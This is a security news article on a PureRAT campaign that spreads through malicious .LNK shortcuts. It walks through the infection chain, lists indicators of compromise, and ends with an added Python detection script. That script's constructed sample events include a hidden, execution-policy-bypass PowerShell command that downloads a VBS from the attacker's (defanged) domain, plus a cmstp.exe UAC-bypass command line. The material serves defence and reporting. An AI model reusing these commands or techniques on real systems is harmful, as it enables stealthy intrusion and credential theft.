
Windows .LNK Shortcuts Exploited by Nasty New PureRAT Variant

An active campaign is using malicious .LNK shortcut files to drop PureRAT, a remote access trojan, on Windows systems. Victims face risks including keylogging, remote desktop control, webcam access, and credential harvesting.

The sophisticated RAT is considered dangerous because of its evasive techniques and multi-stage infection chain that leaves almost no trace on the targeted system’s disk, according to Trellix’s Advanced Research Center.

Prashanth A. N. and Mallikarjun Wali, co-authors of the research, said PureRAT demonstrates how far modern Windows malware has evolved beyond the old “malicious file on disk” model.

Attackers combine trusted system tools, in-memory execution, and hidden payload delivery to stay out of sight throughout an intrusion, researchers wrote in a Tuesday post.

According to Trellix, PureRAT’s stealth approach layers multiple evasive techniques into one tightly staged attack chain. Components include steganography in PNG files, fileless payload delivery, scheduled-task persistence, UAC bypass via cmstp.exe, anti-virtualization checks, and process hollowing into Msbuild.exe.

The combination leaves defenders with fewer traditional artifacts on disk and more malicious activity masquerading as legitimate Windows behavior.

PureRAT: Not New, But Getting More Dangerous

PureRAT first appeared on HackForums in January 2023 and quietly lingered until early 2025, when infections began to spike.

The developer, PureCoder, built an ecosystem around it — PureCrypter for obfuscation and PureLogs for credential theft — all sold separately and combined by criminal customers, according to Check Point Research (September 2025).

The operator base is expanding and maturing. A Vietnamese group pivoted from amateur Python scripts to PureRAT, according to Huntress, demonstrating how commercial malware gives advanced capabilities to developing threat actors. That same actor is now believed to be using AI to write campaign code, according to Symantec and Carbon Black research.

PureRAT is also tracked as Morphisec, ResolverRAT, and PureHVNC and has been active and evolving across the research community for over a year.

The latest version of the two-year-old commercial PureRAT has grown from a forum listing into a fileless, AI-assisted, steganography-powered platform deployed by multiple threat groups, Trellix researchers said.

PureRAT Doesn’t Install Itself — Your PC Does

The attack starts with a shortcut file (.LNK) that looks like a document. Click it, and PowerShell silently pulls down a malicious script. According to Trellix, the action is stealthy and does not trigger a pop-up or warning.

The .LNK stage triggers no user warning because it launches a trusted Windows tool (PowerShell) with hidden, preloaded commands. Since no unknown executable is opened and no elevation is requested, Windows treats the action as routine.

Six steps to infection

  1. PowerShell downloads a VBS file. The hidden command reaches out to hxxps://crixup[.]com/downloads/tryinggim[.]vbs and saves it to the system’s temporary directory.
  2. The VBS file launches immediately. Using Start-Process, it runs with the current user’s privileges — no elevation required.
  3. The VBS copies and hides itself. It copies itself to C:\Users\Public\Downloads\ with a randomized filename, then uses WMI to spawn a new process with ShowWindow = 0 — completely invisible.
  4. It creates a scheduled task. The task runs every minute indefinitely, ensuring persistence even if interrupted.
  5. It uses a junk data trick. The VBS is padded with meaningless data to confuse analysts. Hidden inside is an embedded PowerShell script that is extracted and executed.
  6. The embedded PowerShell reaches out again. It connects to crixup[.]com and downloads what appears to be a PNG file — 0xptimized_MSI.png — which is actually the next-stage payload.

The PNG appears harmless, but the malware is hidden and scrambled inside. PowerShell unpacks it directly into memory — nothing touches the disk.

From there, it moves quickly. It disables UAC using a trusted Windows tool, downloads another disguised payload, and injects it into a legitimate Microsoft process.

Windows sees a trusted process. The attacker sees an open door.

PureRAT then connects back to its command-and-control server, waits for instructions, and reschedules itself every five minutes. By that point, there are no files to detect, no alerts to investigate, and no visible signs for the user.

PureRAT Defenders’ Playbook

Trellix recommends blocking the known IOCs immediately — crixup[.]com, instantservices1[.]ddnsguru[.]com, and 178[.]16[.]52[.]58. Beyond that, the entire attack lives inside legitimate Windows tools, so defenders should alert on PowerShell running hidden or with bypassed execution policies, high-frequency scheduled task creation, and Msbuild.exe or cmstp.exe behaving unusually.

Since nothing malicious ever touches disk, EDR capable of inspecting in-memory .NET loading and process hollowing is essential. Most organizations have no legitimate use for cmstp.exe — restricting it closes the UAC bypass entirely. And as always, least privilege limits the damage if anything gets through.
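The behaviours in the six-step chain and in Trellix's detection advice map onto a handful of process-creation checks. The following is an added example, not code from Trellix or from the article: it runs simple rules over constructed Sysmon-style process-creation records (hidden or bypassed PowerShell, a script host running from C:\Users\Public, a minute-frequency scheduled task, cmstp.exe and MSBuild.exe spawned by a script host). The sample events, the rule names and the assumption that MSBuild launched by a script host is unusual are all mine.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    parent: str    # parent process image name (lower case)
    image: str     # process image name (lower case)
    cmdline: str   # full command line

SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed sample events modelled on the chain in the article; not real telemetry.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "powershell.exe",
              "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -c "
              "iwr hxxps://crixup[.]com/downloads/tryinggim[.]vbs -OutFile $env:TEMP\\t.vbs"),
    ProcEvent("powershell.exe", "wscript.exe", "wscript.exe C:\\Users\\Public\\Downloads\\k3jd9f.vbs"),
    ProcEvent("wscript.exe", "schtasks.exe",
              "schtasks.exe /create /sc minute /mo 1 /tn Updater /tr C:\\Users\\Public\\Downloads\\k3jd9f.vbs"),
    ProcEvent("powershell.exe", "cmstp.exe", "cmstp.exe /s /au C:\\Users\\Public\\x.inf"),
    ProcEvent("powershell.exe", "msbuild.exe", "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe"),
    ProcEvent("explorer.exe", "notepad.exe", "notepad.exe C:\\Users\\me\\notes.txt"),  # benign control
]

def ps_hidden_or_bypass(e):
    return e.image == "powershell.exe" and re.search(
        r"-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy)?\s+bypass", e.cmdline, re.I) is not None

def script_from_public_dir(e):
    return e.image in {"wscript.exe", "cscript.exe"} and "c:\\users\\public\\" in e.cmdline.lower()

def minute_task(e):
    return e.image == "schtasks.exe" and re.search(r"/create\b.*?/sc\s+minute", e.cmdline, re.I) is not None

def cmstp_from_script(e):
    return e.image == "cmstp.exe" and e.parent in SCRIPT_HOSTS

def msbuild_from_script(e):
    # Assumption: MSBuild started by a script host is unusual on non-developer hosts.
    return e.image == "msbuild.exe" and e.parent in SCRIPT_HOSTS

RULES = {"powershell_hidden_or_bypass": ps_hidden_or_bypass,
         "script_host_from_public_dir": script_from_public_dir,
         "scheduled_task_every_minute": minute_task,
         "cmstp_spawned_by_script_host": cmstp_from_script,
         "msbuild_spawned_by_script_host": msbuild_from_script}

def evaluate(events):
    """Return (rule_name, cmdline) for every event that matches a rule."""
    return [(name, e.cmdline) for e in events for name, rule in RULES.items() if rule(e)]

def triggered_rules(events):
    return {name for name, _ in evaluate(events)}

if __name__ == "__main__":
    for name, cmd in evaluate(SAMPLE_EVENTS):
        print(f"[{name}] {cmd}")
```

Several of these rules firing on one host within minutes is the signal worth paging on; any one alone (especially the PowerShell rule) will also match some legitimate administration.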
